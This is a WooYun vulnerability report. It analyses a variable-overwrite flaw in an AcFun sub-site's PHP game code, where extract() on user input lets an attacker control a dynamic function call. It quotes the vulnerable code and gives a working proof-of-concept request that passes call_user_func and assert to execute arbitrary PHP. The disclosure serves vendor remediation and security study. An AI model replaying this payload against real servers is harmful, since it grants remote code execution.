当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023693

漏洞标题:ACFUN分站再次GETSHELL变量覆盖漏洞分析与利用

相关厂商:杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间:2013-05-14 08:36

修复时间:2013-06-28 08:37

公开时间:2013-06-28 08:37

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-14: 细节已通知厂商并且等待厂商处理中
2013-05-14: 厂商已经确认,细节仅向厂商公开
2013-05-24: 细节向核心白帽子及相关领域专家公开
2013-06-03: 细节向普通白帽子公开
2013-06-13: 细节向实习白帽子公开
2013-06-28: 细节向公众公开

简要描述:

最近在学代码审计..找个软柿子下手= 3 =.
感谢@t00000by57 提供的利用思路.

详细说明:

但常在河边走哪有不湿鞋?extract + global早晚是要出问题的..
直接进入正题:
\include\common.inc.php -Line12

require GAME_ROOT.'./include/global.func.php';
error_reporting(E_ALL);
set_error_handler('gameerrorhandler');
$magic_quotes_gpc = get_magic_quotes_gpc();
extract(gstrfilter($_COOKIE));
extract(gstrfilter($_POST));
$_GET = gstrfilter($_GET);
$_REQUEST = gstrfilter($_REQUEST);
$_FILES = gstrfilter($_FILES);//哈?
require GAME_ROOT.'./config.inc.php';


后引入config避免覆盖重要变量.
gstrfilter过滤:
\include\global.inc.php -Line48

function gstrfilter($str) {
	if(is_array($str)) {
		foreach($str as $key => $val) {
			$str[$key] = gstrfilter($val);
		}
	} else {		
		if($GLOBALS['magic_quotes_gpc']) {
			$str = stripslashes($str);
		}
		$str = str_replace("'","",$str);//屏蔽单引号'
		$str = str_replace("\\","",$str);//屏蔽反斜杠/
		$str = htmlspecialchars($str,ENT_COMPAT);//转义html特殊字符,即"<>&
	}
	return $str;
}


重要变量靠'现取现用'再加上过滤就可以从一定程度上避免因为偷懒拼接sqlquery产生的问题了..至少在大部分代码中没问题..
关键在这里:
\command.php -Line3

require './include/common.inc.php';
//$t_s=getmicrotime();
//require_once GAME_ROOT.'./include/JSON.php';
require GAME_ROOT.'./include/game.func.php';
require config('combatcfg',$gamecfg);


\command.php -Line92

if($mode !== 'combat' && $mode !== 'corpse' && strpos($action,'pacorpse')===false && $mode !== 'senditem'){
			$action = '';
		}
		if($command == 'menu') {
			$mode = 'command';
			$action = '';
		} elseif($mode == 'command') {
			if($command == 'move') {
				include_once GAME_ROOT.'./include/game/search.func.php';
				move($moveto);
				if($coldtimeon){$cmdcdtime=$movecoldtime;}
			} elseif($command == 'search') {
				include_once GAME_ROOT.'./include/game/search.func.php';
				search();
				if($coldtimeon){$cmdcdtime=$searchcoldtime;}
			} elseif(strpos($command,'itm') === 0) {
				include_once GAME_ROOT.'./include/game/item.func.php';
				$item = substr($command,3);
				itemuse($item);
				if($coldtimeon){$cmdcdtime=$itemusecoldtime;}
			} elseif(strpos($command,'rest') === 0) {
				if($command=='rest3' && !in_array($pls,$hospitals)){
					$log .= '<span class="yellow">你所在的位置并非医院,不能静养!</span><br>';
				}else{
					$state = substr($command,4,1);
					$mode = 'rest';
				}
			} elseif($command == 'itemmain') {
				$mode = $itemcmd;
			} elseif($command == 'song') {
				$sname=trim(trim($art,'【'),'】');
				include_once GAME_ROOT.'./include/game/song.inc.php';
				//$log.=$sname;
				sing($sname);
			}elseif($command == 'sync') {
				include_once GAME_ROOT.'./include/game/special.func.php';
				syncro($sp_cmd);
				$mode='command';
			}elseif($command == 'special') {
				if($sp_cmd == 'sp_word'){
					include_once GAME_ROOT.'./include/game/special.func.php';
					getword();
					$mode = $sp_cmd;
				}elseif($sp_cmd == 'sp_adtsk'){
					include_once GAME_ROOT.'./include/game/special.func.php';
					adtsk();
					$mode = 'command';
				}elseif($sp_cmd == 'sp_pbomb'){
					$mode = 'sp_pbomb';
				}elseif($sp_cmd == 'sp_weapon'){
					include_once GAME_ROOT.'./include/game/special.func.php';
					weaponswap();
					$mode = 'command';
					if($coldtimeon){$cmdcdtime=$weaponswapcoldtime;}
				}elseif($sp_cmd == 'oneonone'){
					$mode='oneonone';
				}elseif($sp_cmd == 'sp_skpts'){
					include_once GAME_ROOT.'./include/game/clubskills.func.php';
					calcskills($skarr);
					$p12[1]=1; $p12[2]=2;
					$mode='sp_skpts';
				}else{
					$mode = $sp_cmd;
				}
				
			} elseif($command == 'team') {
				include_once GAME_ROOT.'./include/game/team.func.php';
				if($teamcmd == 'teamquit') {				
					teamquit();
				} else{
					teamcheck();
				}
			}
   //省略一部分..直接进入最后逻辑
		} elseif($mode == 'senditem') {
			include_once GAME_ROOT.'./include/game/battle.func.php';
			senditem();
		} elseif($mode == 'combat') {
			include_once GAME_ROOT.'./include/game/combat.func.php';
			combat(1,$command);
		} elseif($mode == 'rest') {
			include_once GAME_ROOT.'./include/state.func.php';
			rest($command);
//		} elseif($mode == 'chgpassword') {
//			include_once GAME_ROOT.'./include/game/special.func.php';
//			chgpassword($oldpswd,$newpswd,$newpswd2);
//		} elseif($mode == 'chgword') {
//			include_once GAME_ROOT.'./include/game/special.func.php';
//			chgword($newmotto,$newlastword,$newkillmsg);
		} elseif($mode == 'corpse') {
			include_once GAME_ROOT.'./include/game/itemmain.func.php';
			getcorpse($command);
		} elseif($mode == 'team') {
			include_once GAME_ROOT.'./include/game/team.func.php';
			$command($nteamID,$nteamPass);//<----------
		}


team.func.php中存在两个方法,建立队伍function teammake($tID,$tPass)和加入队伍 function teamjoin($tID,$tPass),依靠$command传来的指令选择,但是感觉像是程序员在偷懒的时候忘记了上面extract解包?

漏洞证明:

构造请求:
$_POST['mode']='team',
$_POST['command']='call_user_func',
$_POST['nteamID']='assert',
$_POST['nteamPass']='phpinfo()'。

20130514032312.png


修复方案:

别偷懒..

版权声明:转载请注明来源 N1ghtBird@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-05-14 09:19

厂商回复:

已向大逃杀通报

最新状态:

暂无